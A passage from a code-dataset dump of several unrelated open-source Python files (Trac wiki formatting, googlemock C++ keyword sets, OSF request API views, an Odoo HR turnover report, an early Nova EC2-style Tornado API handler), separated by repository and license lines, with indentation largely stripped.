if self.code_prefix and all(not l or
l.startswith(self.code_prefix)
for l in self.code_buf):
code_indent = len(self.code_prefix)
self.code_buf = [l[code_indent:]
for l in self.code_buf]
self.code_buf.append('')
code_text = '\n'.join(self.code_buf)
processed = self._exec_processor(self.code_processor,
code_text)
self.out.write(_markup_to_unicode(processed))
else:
self.code_buf.append(line)
elif not self.code_processor:
match = WikiParser._processor_re.match(line)
if match:
self.code_prefix = match.group(1)
name = match.group(2)
args = parse_processor_args(line[match.end():])
self.code_processor = WikiProcessor(self, name, args)
else:
self.code_buf.append(line)
self.code_processor = WikiProcessor(self, 'default')
else:
self.code_buf.append(line)
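    # Example (annotation): a '{{{#!python' ... '}}}' block is buffered line
    # by line and handed to the named WikiProcessor once the matching
    # ENDBLOCK is seen; nested '{{{' openers just bump in_code_block, so only
    # the outermost '}}}' triggers rendering.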
def close_code_blocks(self):
while self.in_code_block > 0:
self.handle_code_block(WikiParser.ENDBLOCK)
def _exec_processor(self, processor, text):
try:
return processor.process(text)
except ProcessorError as e:
return system_message(_("Processor %(name)s failed",
name=processor.name), to_fragment(e))
except Exception as e:
self.env.log.error("Processor %s failed for %s:%s",
processor.name, self.resource,
exception_to_unicode(e, traceback=True))
return system_message(_("Error: Processor %(name)s failed",
name=processor.name), to_fragment(e))
# > quotes
def handle_quote_block(self, line):
self.close_paragraph()
depth = line.find('>')
# Close lists up to current level:
#
# - first level item
# - second level item
# > citation part of first level item
#
# (depth == 3, _list_stack == [1, 3])
if not self._quote_buffer and depth < self._get_list_depth():
self.close_list(depth)
self._quote_buffer.append(line[depth + 1:])
def close_quote_block(self, escape_newlines):
if self._quote_buffer:
# avoid an extra <blockquote> when there's consistently one space
# after the '>'
if all(not line or line[0] in '> ' for line in self._quote_buffer):
self._quote_buffer = [line[bool(line and line[0] == ' '):]
for line in self._quote_buffer]
self.out.write(u'<blockquote class="citation">\n')
Formatter(self.env, self.context).format(self._quote_buffer,
self.out, escape_newlines)
self.out.write(u'</blockquote>\n')
self._quote_buffer = []
# -- Wiki engine
def handle_match(self, fullmatch):
for itype, match in fullmatch.groupdict().items():
            if match and itype not in self.wikiparser.helper_patterns:
# Check for preceding escape character '!'
if match[0] == '!':
return escape(match[1:])
if itype in self.wikiparser.external_handlers:
external_handler = self.wikiparser.external_handlers[itype]
return external_handler(self, match, fullmatch)
else:
internal_handler = getattr(self, '_%s_formatter' % itype)
return internal_handler(match, fullmatch)
def replace(self, fullmatch):
"""Replace one match with its corresponding expansion"""
replacement = self.handle_match(fullmatch)
if replacement:
return _markup_to_unicode(replacement)
_normalize_re = re.compile(r'[\v\f]', re.UNICODE)
def reset(self, source, out=None):
if isinstance(source, basestring):
source = re.sub(self._normalize_re, ' ', source)
self.source = source
class NullOut(object):
def write(self, data):
pass
self.out = out or NullOut()
self._open_tags = []
self._list_stack = []
self._quote_stack = []
self._tabstops = []
self._quote_buffer = []
self.in_code_block = 0
self.in_table = 0
self.in_def_list = 0
self.in_table_row = 0
self.continue_table = 0
self.continue_table_row = 0
self.in_table_cell = ''
self.paragraph_open = 0
return source
def format(self, text, out=None, escape_newlines=False):
text = self.reset(text, out)
if isinstance(text, basestring):
text = text.splitlines()
for line in text:
if isinstance(line, str):
line = line.decode('utf-8')
# Detect start of code block (new block or embedded block)
block_start_match = None
if WikiParser.ENDBLOCK not in line:
block_start_match = WikiParser._startblock_re.match(line)
# Handle content or end of code block
if self.in_code_block:
self.handle_code_block(line, block_start_match)
continue
# Handle citation quotes '> ...'
if line.strip().startswith('>'):
self.handle_quote_block(line)
continue
# Handle end of citation quotes
self.close_quote_block(escape_newlines)
# Handle start of a new block
if block_start_match:
self.handle_code_block(line, block_start_match)
continue
# Handle Horizontal ruler
if line[0:4] == '----':
self.close_table()
self.close_paragraph()
self.close_indentation()
self.close_list()
self.close_def_list()
self.out.write(u'<hr />\n')
continue
# Handle new paragraph
if line == '':
self.close_table()
self.close_paragraph()
self.close_indentation()
self.close_list()
self.close_def_list()
continue
# Tab expansion and clear tabstops if no indent
line = line.replace('\t', ' '*8)
if not line.startswith(' '):
self._tabstops = []
# Handle end of indentation
if not line.startswith(' ') and self._quote_stack:
self.close_indentation()
self.in_list_item = False
self.in_quote = False
# Throw a bunch of regexps on the problem
self.line = line
result = re.sub(self.wikiparser.rules, self.replace, line)
if not self.in_list_item:
self.close_list()
if not self.in_quote:
self.close_indentation()
if self.in_def_list and not line.startswith(' '):
self.close_def_list()
if self.in_table and not self.continue_table:
self.close_table()
self.continue_table = 0
sep = '\n'
if not(self.in_list_item or self.in_def_list or self.in_table):
if len(result):
self.open_paragraph()
if escape_newlines and self.paragraph_open and \
not result.rstrip().endswith('<br />'):
sep = '<br />' + sep
self.out.write(result + sep)
self.close_table_row()
self.close_code_blocks()
self.close_quote_block(escape_newlines)
self.close_table()
self.close_paragraph()
self.close_indentation()
self.close_list()
self.close_def_list()
class OneLinerFormatter(Formatter):
"""
    A special version of the wiki formatter that only implements a
    subset of the wiki formatting functions. This version is useful
    for rendering short wiki-formatted messages on a single line.
"""
flavor = 'oneliner'
# Override a few formatters to disable some wiki syntax in "oneliner"-mode
def _list_formatter(self, match, fullmatch):
return match
def _indent_formatter(self, match, fullmatch):
return match
def _citation_formatter(self, match, fullmatch):
return escape(match, False)
def _heading_formatter(self, match, fullmatch):
return escape(match, False)
def _definition_formatter(self, match, fullmatch):
return escape(match, False)
def _table_cell_formatter(self, match, fullmatch):
return match
def _table_row_sep_formatter(self, match, fullmatch):
return ''
def _linebreak_wc_formatter(self, match, fullmatch):
return ' '
def _macro_formatter(self, match, fullmatch, macro):
name = fullmatch.group('macroname')
if name.lower() == 'br':
return ' '
args = fullmatch.group('macroargs')
if macro.is_inline(args):
return Formatter._macro_formatter(self, match, fullmatch, macro)
else:
return '[[%s%s]]' % (name, '(...)' if args else '')
def format(self, text, out, shorten=False):
if not text:
return
text = self.reset(text, out)
# Simplify code blocks
in_code_block = 0
processor = None
buf = io.StringIO()
for line in text.strip().splitlines():
if isinstance(line, str):
line = line.decode('utf-8')
if WikiParser.ENDBLOCK not in line and \
WikiParser._startblock_re.match(line):
in_code_block += 1
elif line.strip() == WikiParser.ENDBLOCK:
if in_code_block:
in_code_block -= 1
if in_code_block == 0:
if processor != 'comment':
buf.write(u' [...]\n')
processor = None
elif in_code_block:
if not processor:
if line.startswith('#!'):
processor = line[2:].strip()
else:
buf.write(line + '\n')
result = buf.getvalue()[:-len('\n')]
if shorten:
result = shorten_line(result)
result = re.sub(self.wikiparser.rules, self.replace, result)
result = result.replace('[...]', u'[\u2026]')
if result.endswith('...'):
result = result[:-3] + u'\u2026'
self.out.write(result)
# Close all open 'one line'-tags
self.flush_tags()
# Flush unterminated code blocks
if in_code_block > 0:
self.out.write(u'[\u2026]')
class OutlineFormatter(Formatter):
"""Special formatter that generates an outline of all the headings."""
flavor = 'outline'
# Avoid the possible side-effects of rendering WikiProcessors
def _macro_formatter(self, match, fullmatch, macro):
name = fullmatch.group('macroname')
if name.lower() == 'br':
return ' '
args = fullmatch.group('macroargs')
if macro.is_inline(args):
return Formatter._macro_formatter(self, match, fullmatch, macro)
return ''
def handle_code_block(self, line, startmatch=None):
if WikiParser.ENDBLOCK not in line and \
WikiParser._startblock_re.match(line):
self.in_code_block += 1
elif line.strip() == WikiParser.ENDBLOCK:
self.in_code_block -= 1
def format(self, text, out, max_depth=6, min_depth=1, shorten=True):
self.shorten = shorten
whitespace_indent = ' '
self.outline = []
Formatter.format(self, text)
if min_depth > max_depth:
min_depth, max_depth = max_depth, min_depth
max_depth = min(6, max_depth)
min_depth = max(1, min_depth)
curr_depth = min_depth - 1
out.write(u'\n')
for depth, anchor, text in self.outline:
if depth < min_depth or depth > max_depth:
continue
if depth > curr_depth: # Deeper indent
for i in xrange(curr_depth, depth):
out.write(whitespace_indent * (2*i) + u'<ol>\n' +
whitespace_indent * (2*i+1) + u'<li>\n')
elif depth < curr_depth: # Shallower indent
for i in xrange(curr_depth-1, depth-1, -1):
out.write(whitespace_indent * (2*i+1) + u'</li>\n' +
whitespace_indent * (2*i) + u'</ol>\n')
out.write(whitespace_indent * (2*depth-1) + u'</li>\n' +
whitespace_indent * (2*depth-1) + u'<li>\n')
else: # Same indent
out.write( whitespace_indent * (2*depth-1) + u'</li>\n' +
whitespace_indent * (2*depth-1) + u'<li>\n')
curr_depth = depth
out.write(whitespace_indent * (2*depth) +
u'<a href="#%s">%s</a>\n' % (anchor, text))
# Close out all indentation
for i in xrange(curr_depth-1, min_depth-2, -1):
out.write(whitespace_indent * (2*i+1) + u'</li>\n' +
whitespace_indent * (2*i) + u'</ol>\n')
def _heading_formatter(self, match, fullmatch):
depth, heading, anchor = self._parse_heading(match, fullmatch,
self.shorten)
heading = re.sub(r'</?a(?: .*?)?>', '', heading) # Strip out link tags
self.outline.append((depth, anchor, heading))
class LinkFormatter(OutlineFormatter):
"""Special formatter that focuses on TracLinks."""
flavor = 'link'
def _heading_formatter(self, match, fullmatch):
return ''
def match(self, wikitext):
"""Return the Wiki match found at the beginning of the `wikitext`"""
wikitext = self.reset(wikitext)
self.line = wikitext
match = re.match(self.wikiparser.rules, wikitext)
if match:
return self.handle_match(match)
# Pure Wiki Formatter
class HtmlFormatter(object):
"""Format parsed wiki text to HTML"""
flavor = 'default'
def __init__(self, env, context, wikidom):
self.env = env
self.context = context
if isinstance(wikidom, basestring):
wikidom = WikiParser(env).parse(wikidom)
self.wikidom = wikidom
def generate(self, escape_newlines=False):
"""Generate HTML elements.
        Newlines in the wikidom will be preserved if `escape_newlines` is set.
"""
# FIXME: compatibility code only for now
out = io.StringIO()
Formatter(self.env, self.context).format(self.wikidom, out,
escape_newlines)
return Markup(out.getvalue())
class InlineHtmlFormatter(object):
"""Format parsed wiki text to inline elements HTML.
Block level content will be discarded or compacted.
"""
flavor = 'oneliner'
def __init__(self, env, context, wikidom):
self.env = env
self.context = context
if isinstance(wikidom, basestring):
wikidom = WikiParser(env).parse(wikidom)
self.wikidom = wikidom
def generate(self, shorten=False):
"""Generate HTML inline elements.
If `shorten` is set, the generation will stop once enough characters
have been emitted.
"""
# FIXME: compatibility code only for now
out = io.StringIO()
OneLinerFormatter(self.env, self.context).format(self.wikidom, out,
shorten)
return Markup(out.getvalue())
def format_to(env, flavor, context, wikidom, **options):
if flavor is None:
flavor = context.get_hint('wiki_flavor', 'html')
if flavor == 'oneliner':
return format_to_oneliner(env, context, wikidom, **options)
else:
return format_to_html(env, context, wikidom, **options)
def format_to_html(env, context, wikidom, escape_newlines=None):
if not wikidom:
return Markup()
if escape_newlines is None:
escape_newlines = context.get_hint('preserve_newlines', False)
return HtmlFormatter(env, context, wikidom).generate(escape_newlines)
def format_to_oneliner(env, context, wikidom, shorten=None):
if not wikidom:
return Markup()
if shorten is None:
shorten = context.get_hint('shorten_lines', False)
return InlineHtmlFormatter(env, context, wikidom).generate(shorten)
def extract_link(env, context, wikidom):
if not wikidom:
return Markup()
return LinkFormatter(env, context).match(wikidom)
# pre-0.11 wiki text to Markup compatibility methods
def wiki_to_outline(wikitext, env, db=None,
absurls=False, max_depth=None, min_depth=None, req=None):
""":deprecated: will be removed in 1.0 and replaced by something else"""
if not wikitext:
return Markup()
abs_ref, href = (req or env).abs_href, (req or env).href
from trac.web.chrome import web_context
context = web_context(req, absurls=absurls)
out = io.StringIO()
OutlineFormatter(env, context).format(wikitext, out, max_depth, min_depth)
return Markup(out.getvalue())
| bsd-3-clause |
ned14/MaidSafe | src/third_party_libs/googlemock/scripts/generator/cpp/keywords.py | 1157 | 2004 | #!/usr/bin/env python
#
# Copyright 2007 Neal Norwitz
# Portions Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""C++ keywords and helper utilities for determining keywords."""
__author__ = 'nnorwitz@google.com (Neal Norwitz)'
try:
# Python 3.x
import builtins
except ImportError:
# Python 2.x
import __builtin__ as builtins
if not hasattr(builtins, 'set'):
# Nominal support for Python 2.3.
from sets import Set as set
TYPES = set('bool char int long short double float void wchar_t unsigned signed'.split())
TYPE_MODIFIERS = set('auto register const inline extern static virtual volatile mutable'.split())
ACCESS = set('public protected private friend'.split())
CASTS = set('static_cast const_cast dynamic_cast reinterpret_cast'.split())
OTHERS = set('true false asm class namespace using explicit this operator sizeof'.split())
OTHER_TYPES = set('new delete typedef struct union enum typeid typename template'.split())
CONTROL = set('case switch default if else return goto'.split())
EXCEPTION = set('try catch throw'.split())
LOOP = set('while do for break continue'.split())
ALL = TYPES | TYPE_MODIFIERS | ACCESS | CASTS | OTHERS | OTHER_TYPES | CONTROL | EXCEPTION | LOOP
def IsKeyword(token):
return token in ALL
def IsBuiltinType(token):
if token in ('virtual', 'inline'):
# These only apply to methods, they can't be types by themselves.
return False
return token in TYPES or token in TYPE_MODIFIERS
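# Example usage (annotation, not part of the upstream file):
#   IsKeyword('while') -> True
#   IsBuiltinType('unsigned') -> True
#   IsBuiltinType('virtual') -> False  (method-only modifier, never a type)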
| gpl-3.0 |
cslzchen/osf.io | api/requests/views.py | 4 | 6017 | from __future__ import unicode_literals
from rest_framework import generics
from rest_framework import permissions
from rest_framework.exceptions import NotFound
from api.actions.serializers import PreprintRequestActionSerializer
from api.base.views import JSONAPIBaseView
from api.base import permissions as base_permissions
from api.base.filters import ListFilterMixin
from api.base.utils import get_object_or_error
from api.requests.permissions import NodeRequestPermission, PreprintRequestPermission
from api.requests.serializers import NodeRequestSerializer, PreprintRequestSerializer
from framework.auth.oauth_scopes import CoreScopes
from osf.models import Node, NodeRequest, PreprintRequest, Preprint
class RequestMixin(object):
serializer_class = None
request_class = None
request_display_name = None
target_class = None
target_display_name = None
target_lookup_url_kwarg = None
request_lookup_url_kwarg = None
def __get_object(self, object_class, lookup_arg, display_name, check_object_permissions=True):
obj = get_object_or_error(
object_class,
self.kwargs[lookup_arg],
self.request,
display_name=display_name,
)
# May raise a permission denied
if check_object_permissions:
self.check_object_permissions(self.request, obj)
return obj
def get_request(self, check_object_permissions=True):
return self.__get_object(self.request_class, self.request_lookup_url_kwarg, self.request_display_name, check_object_permissions=check_object_permissions)
def get_target(self, check_object_permissions=True):
return self.__get_object(self.target_class, self.target_lookup_url_kwarg, self.target_display_name, check_object_permissions=check_object_permissions)
class NodeRequestMixin(RequestMixin):
serializer_class = NodeRequestSerializer
request_class = NodeRequest
request_display_name = 'node request'
target_class = Node
target_display_name = 'node'
target_lookup_url_kwarg = 'node_id'
request_lookup_url_kwarg = 'request_id'
class PreprintRequestMixin(RequestMixin):
serializer_class = PreprintRequestSerializer
request_class = PreprintRequest
request_display_name = 'preprint request'
target_class = Preprint
target_display_name = 'preprint'
target_lookup_url_kwarg = 'preprint_id'
request_lookup_url_kwarg = 'request_id'
class RequestDetail(JSONAPIBaseView, generics.RetrieveAPIView):
permission_classes = (
permissions.IsAuthenticatedOrReadOnly,
base_permissions.TokenHasScope,
)
required_read_scopes = [CoreScopes.ALWAYS_PUBLIC] # Actual scope checks are done on subview.as_view
required_write_scopes = [CoreScopes.NULL]
view_category = 'requests'
view_name = 'request-detail'
def get(self, request, *args, **kwargs):
request_id = self.kwargs['request_id']
if NodeRequest.objects.filter(_id=request_id).exists():
return NodeRequestDetail.as_view()(request._request, *args, **kwargs)
elif PreprintRequest.objects.filter(_id=request_id).exists():
return PreprintRequestDetail.as_view()(request._request, *args, **kwargs)
else:
raise NotFound
class NodeRequestDetail(JSONAPIBaseView, generics.RetrieveAPIView, NodeRequestMixin):
permission_classes = (
permissions.IsAuthenticatedOrReadOnly,
base_permissions.TokenHasScope,
NodeRequestPermission,
)
required_read_scopes = [CoreScopes.NODE_REQUESTS_READ]
required_write_scopes = [CoreScopes.NULL]
serializer_class = NodeRequestSerializer
view_category = 'requests'
view_name = 'node-request-detail'
def get_object(self):
return self.get_request()
class PreprintRequestDetail(JSONAPIBaseView, generics.RetrieveAPIView, PreprintRequestMixin):
permission_classes = (
permissions.IsAuthenticatedOrReadOnly,
base_permissions.TokenHasScope,
PreprintRequestPermission,
)
required_read_scopes = [CoreScopes.PREPRINT_REQUESTS_READ]
required_write_scopes = [CoreScopes.NULL]
serializer_class = PreprintRequestSerializer
view_category = 'requests'
view_name = 'preprint-request-detail'
def get_object(self):
return self.get_request()
class RequestActionList(JSONAPIBaseView, generics.ListAPIView):
permission_classes = (
permissions.IsAuthenticatedOrReadOnly,
base_permissions.TokenHasScope,
)
required_read_scopes = [CoreScopes.ACTIONS_READ]
required_write_scopes = [CoreScopes.NULL]
view_category = 'requests'
view_name = 'request-action-list'
def get(self, request, *args, **kwargs):
request_id = self.kwargs['request_id']
if PreprintRequest.objects.filter(_id=request_id).exists():
return PreprintRequestActionList.as_view()(request._request, *args, **kwargs)
else:
raise NotFound
class PreprintRequestActionList(JSONAPIBaseView, generics.ListAPIView, PreprintRequestMixin, ListFilterMixin):
permission_classes = (
permissions.IsAuthenticatedOrReadOnly,
base_permissions.TokenHasScope,
PreprintRequestPermission,
)
required_read_scopes = [CoreScopes.ACTIONS_READ]
required_write_scopes = [CoreScopes.NULL]
serializer_class = PreprintRequestActionSerializer
view_category = 'requests'
view_name = 'preprint-request-action-list'
# supports MustBeModerator
def get_provider(self):
request_id = self.kwargs['request_id']
preprint_request = PreprintRequest.load(request_id)
if preprint_request:
return preprint_request.target.provider
raise NotFound
# overrides ListFilterMixin
def get_default_queryset(self):
return self.get_request().actions.order_by('-created').all()
# overrides ListAPIView
def get_queryset(self):
return self.get_queryset_from_request()
| apache-2.0 |
BT-csanchez/hr | __unported__/hr_report_turnover/report/employee_turnover.py | 21 | 5031 | # -*- coding:utf-8 -*-
#
#
# Copyright (C) 2013 Michael Telahun Makonnen <mmakonnen@gmail.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
#
from datetime import datetime
from openerp.tools import DEFAULT_SERVER_DATE_FORMAT as OE_DATEFORMAT
from report import report_sxw
class Parser(report_sxw.rml_parse):
def __init__(self, cr, uid, name, context):
super(Parser, self).__init__(cr, uid, name, context)
self.localcontext.update({
'get_hno': self.get_hno,
'get_tno': self.get_tno,
'get_start': self.get_start,
'get_end': self.get_end,
'get_hires': self.get_hires,
'get_terminations': self.get_terminations,
'get_total_terminations': self.get_sumt,
'get_total_hires': self.get_sumh,
})
self.start_date = False
self.end_date = False
self.hno = 0
self.tno = 0
self.hdepartment_id = False
self.tdepartment_id = False
self.sumh = 0
self.sumt = 0
def set_context(self, objects, data, ids, report_type=None):
if data.get('form', False) and data['form'].get('start_date', False):
self.start_date = data['form']['start_date']
if data.get('form', False) and data['form'].get('end_date', False):
self.end_date = data['form']['end_date']
return super(Parser, self).set_context(
objects, data, ids, report_type=report_type)
def get_start(self):
return datetime.strptime(self.start_date, OE_DATEFORMAT).strftime(
'%B %d, %Y')
def get_end(self):
return datetime.strptime(self.end_date, OE_DATEFORMAT).strftime(
'%B %d, %Y')
def get_hno(self, department_id):
if not self.hdepartment_id or self.hdepartment_id != department_id:
self.hdepartment_id = department_id
self.hno = 1
else:
self.hno += 1
return self.hno
def get_tno(self, department_id):
if not self.tdepartment_id or self.tdepartment_id != department_id:
self.tdepartment_id = department_id
self.tno = 1
else:
self.tno += 1
return self.tno
def get_hires(self, department_id, docount=False):
res = []
dStart = datetime.strptime(self.start_date, OE_DATEFORMAT)
dEnd = datetime.strptime(self.end_date, OE_DATEFORMAT)
department = self.pool.get('hr.department').browse(
self.cr, self.uid, department_id)
for ee in department.member_ids:
            # if there are no contracts, or more than one contract, assume
            # this is not a new employee
if len(ee.contract_ids) == 0 or len(ee.contract_ids) > 1:
continue
d = datetime.strptime(ee.contract_id.date_start, OE_DATEFORMAT)
if dStart <= d <= dEnd:
res.append({'name': ee.name,
'f_employee_no': ee.f_employee_no,
'hire_date': ee.contract_id.date_start})
if docount:
self.sumh += 1
return res
def get_terminations(self, department_id, docount=False):
res = []
seen_ids = []
term_obj = self.pool.get('hr.employee.termination')
term_ids = term_obj.search(
self.cr, self.uid, [('name', '>=', self.start_date),
('name', '<=', self.end_date), ])
for term in term_obj.browse(self.cr, self.uid, term_ids):
if term.employee_id.department_id:
dept_id = term.employee_id.department_id.id
elif term.employee_id.saved_department_id:
dept_id = term.employee_id.saved_department_id.id
else:
dept_id = False
if (
term.employee_id.id not in seen_ids
and dept_id == department_id
):
res.append({'name': term.employee_id.name,
'f_employee_no': term.employee_id.f_employee_no,
'termination_date': term.name})
seen_ids.append(term.employee_id.id)
if docount:
self.sumt += len(res)
return res
def get_sumh(self):
return self.sumh
def get_sumt(self):
return self.sumt
| agpl-3.0 |
movmov/cc | nova/endpoint/api.py | 2 | 11345 | #!/usr/bin/python
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright [2010] [Anso Labs, LLC]
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Tornado REST API Request Handlers for Nova functions
Most calls are proxied into the responsible controller.
"""
import logging
import multiprocessing
import random
import re
import urllib
# TODO(termie): replace minidom with etree
from xml.dom import minidom
from nova import vendor
import tornado.web
from twisted.internet import defer
from nova import crypto
from nova import exception
from nova import flags
from nova import utils
from nova.endpoint import cloud
from nova.auth import users
FLAGS = flags.FLAGS
flags.DEFINE_integer('cc_port', 8773, 'cloud controller port')
_log = logging.getLogger("api")
_log.setLevel(logging.DEBUG)
_c2u = re.compile('(((?<=[a-z])[A-Z])|([A-Z](?![A-Z]|$)))')
def _camelcase_to_underscore(str):
return _c2u.sub(r'_\1', str).lower().strip('_')
def _underscore_to_camelcase(str):
return ''.join([x[:1].upper() + x[1:] for x in str.split('_')])
def _underscore_to_xmlcase(str):
res = _underscore_to_camelcase(str)
return res[:1].lower() + res[1:]
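# Examples (annotation): _camelcase_to_underscore('DescribeInstances') returns
# 'describe_instances', and _underscore_to_xmlcase('instance_id') returns
# 'instanceId' -- the shapes EC2 uses for action names and XML element names.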
class APIRequestContext(object):
def __init__(self, handler, user, project):
self.handler = handler
self.user = user
self.project = project
self.request_id = ''.join(
[random.choice('ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890-')
for x in xrange(20)]
)
class APIRequest(object):
def __init__(self, controller, action):
self.controller = controller
self.action = action
def send(self, context, **kwargs):
try:
method = getattr(self.controller,
_camelcase_to_underscore(self.action))
except AttributeError:
_error = ('Unsupported API request: controller = %s,'
'action = %s') % (self.controller, self.action)
_log.warning(_error)
# TODO: Raise custom exception, trap in apiserver,
# and reraise as 400 error.
raise Exception(_error)
args = {}
for key, value in kwargs.items():
parts = key.split(".")
key = _camelcase_to_underscore(parts[0])
if len(parts) > 1:
d = args.get(key, {})
d[parts[1]] = value[0]
value = d
else:
value = value[0]
args[key] = value
for key in args.keys():
if isinstance(args[key], dict):
if args[key] != {} and args[key].keys()[0].isdigit():
s = args[key].items()
s.sort()
args[key] = [v for k, v in s]
d = defer.maybeDeferred(method, context, **args)
d.addCallback(self._render_response, context.request_id)
return d
def _render_response(self, response_data, request_id):
xml = minidom.Document()
response_el = xml.createElement(self.action + 'Response')
response_el.setAttribute('xmlns',
'http://ec2.amazonaws.com/doc/2009-11-30/')
request_id_el = xml.createElement('requestId')
request_id_el.appendChild(xml.createTextNode(request_id))
response_el.appendChild(request_id_el)
        if response_data == True:
self._render_dict(xml, response_el, {'return': 'true'})
else:
self._render_dict(xml, response_el, response_data)
xml.appendChild(response_el)
response = xml.toxml()
xml.unlink()
_log.debug(response)
return response
def _render_dict(self, xml, el, data):
try:
for key in data.keys():
val = data[key]
el.appendChild(self._render_data(xml, key, val))
except:
_log.debug(data)
raise
def _render_data(self, xml, el_name, data):
el_name = _underscore_to_xmlcase(el_name)
data_el = xml.createElement(el_name)
if isinstance(data, list):
for item in data:
data_el.appendChild(self._render_data(xml, 'item', item))
elif isinstance(data, dict):
self._render_dict(xml, data_el, data)
elif hasattr(data, '__dict__'):
self._render_dict(xml, data_el, data.__dict__)
elif isinstance(data, bool):
data_el.appendChild(xml.createTextNode(str(data).lower()))
elif data != None:
data_el.appendChild(xml.createTextNode(str(data)))
return data_el
class RootRequestHandler(tornado.web.RequestHandler):
def get(self):
# available api versions
versions = [
'1.0',
'2007-01-19',
'2007-03-01',
'2007-08-29',
'2007-10-10',
'2007-12-15',
'2008-02-01',
'2008-09-01',
'2009-04-04',
]
for version in versions:
self.write('%s\n' % version)
self.finish()
class MetadataRequestHandler(tornado.web.RequestHandler):
def print_data(self, data):
if isinstance(data, dict):
output = ''
for key in data:
if key == '_name':
continue
output += key
if isinstance(data[key], dict):
if '_name' in data[key]:
output += '=' + str(data[key]['_name'])
else:
output += '/'
output += '\n'
self.write(output[:-1]) # cut off last \n
elif isinstance(data, list):
self.write('\n'.join(data))
else:
self.write(str(data))
def lookup(self, path, data):
items = path.split('/')
for item in items:
if item:
if not isinstance(data, dict):
return data
if not item in data:
return None
data = data[item]
return data
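    # Example (annotation): lookup('meta-data/instance-id',
    # {'meta-data': {'instance-id': 'i-00000001'}}) returns 'i-00000001';
    # a missing key returns None, which get() below maps to a 404.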
def get(self, path):
cc = self.application.controllers['Cloud']
meta_data = cc.get_metadata(self.request.remote_ip)
if meta_data is None:
_log.error('Failed to get metadata for ip: %s' %
self.request.remote_ip)
raise tornado.web.HTTPError(404)
data = self.lookup(path, meta_data)
if data is None:
raise tornado.web.HTTPError(404)
self.print_data(data)
self.finish()
class APIRequestHandler(tornado.web.RequestHandler):
def get(self, controller_name):
self.execute(controller_name)
@tornado.web.asynchronous
def execute(self, controller_name):
# Obtain the appropriate controller for this request.
try:
controller = self.application.controllers[controller_name]
except KeyError:
self._error('unhandled', 'no controller named %s' % controller_name)
return
args = self.request.arguments
# Read request signature.
try:
signature = args.pop('Signature')[0]
except:
raise tornado.web.HTTPError(400)
# Make a copy of args for authentication and signature verification.
auth_params = {}
for key, value in args.items():
auth_params[key] = value[0]
# Get requested action and remove authentication args for final request.
try:
action = args.pop('Action')[0]
access = args.pop('AWSAccessKeyId')[0]
args.pop('SignatureMethod')
args.pop('SignatureVersion')
args.pop('Version')
args.pop('Timestamp')
except:
raise tornado.web.HTTPError(400)
# Authenticate the request.
try:
(user, project) = users.UserManager.instance().authenticate(
access,
signature,
auth_params,
self.request.method,
self.request.host,
self.request.path
)
except exception.Error, ex:
logging.debug("Authentication Failure: %s" % ex)
raise tornado.web.HTTPError(403)
_log.debug('action: %s' % action)
for key, value in args.items():
_log.debug('arg: %s\t\tval: %s' % (key, value))
request = APIRequest(controller, action)
context = APIRequestContext(self, user, project)
d = request.send(context, **args)
# d.addCallback(utils.debug)
# TODO: Wrap response in AWS XML format
d.addCallbacks(self._write_callback, self._error_callback)
def _write_callback(self, data):
self.set_header('Content-Type', 'text/xml')
self.write(data)
self.finish()
def _error_callback(self, failure):
try:
failure.raiseException()
except exception.ApiError as ex:
self._error(type(ex).__name__ + "." + ex.code, ex.message)
# TODO(vish): do something more useful with unknown exceptions
except Exception as ex:
self._error(type(ex).__name__, str(ex))
raise
def post(self, controller_name):
self.execute(controller_name)
def _error(self, code, message):
self._status_code = 400
self.set_header('Content-Type', 'text/xml')
self.write('<?xml version="1.0"?>\n')
self.write('<Response><Errors><Error><Code>%s</Code>'
'<Message>%s</Message></Error></Errors>'
'<RequestID>?</RequestID></Response>' % (code, message))
self.finish()
class APIServerApplication(tornado.web.Application):
def __init__(self, user_manager, controllers):
tornado.web.Application.__init__(self, [
(r'/', RootRequestHandler),
(r'/services/([A-Za-z0-9]+)/', APIRequestHandler),
(r'/latest/([-A-Za-z0-9/]*)', MetadataRequestHandler),
(r'/2009-04-04/([-A-Za-z0-9/]*)', MetadataRequestHandler),
(r'/2008-09-01/([-A-Za-z0-9/]*)', MetadataRequestHandler),
(r'/2008-02-01/([-A-Za-z0-9/]*)', MetadataRequestHandler),
(r'/2007-12-15/([-A-Za-z0-9/]*)', MetadataRequestHandler),
(r'/2007-10-10/([-A-Za-z0-9/]*)', MetadataRequestHandler),
(r'/2007-08-29/([-A-Za-z0-9/]*)', MetadataRequestHandler),
(r'/2007-03-01/([-A-Za-z0-9/]*)', MetadataRequestHandler),
(r'/2007-01-19/([-A-Za-z0-9/]*)', MetadataRequestHandler),
(r'/1.0/([-A-Za-z0-9/]*)', MetadataRequestHandler),
], pool=multiprocessing.Pool(4))
self.user_manager = user_manager
self.controllers = controllers
| apache-2.0 |
Codefans-fan/odoo | addons/base_import_module/tests/test_module/__openerp__.py | 377 | 1290 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2013-Today OpenERP SA (<http://www.openerp.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
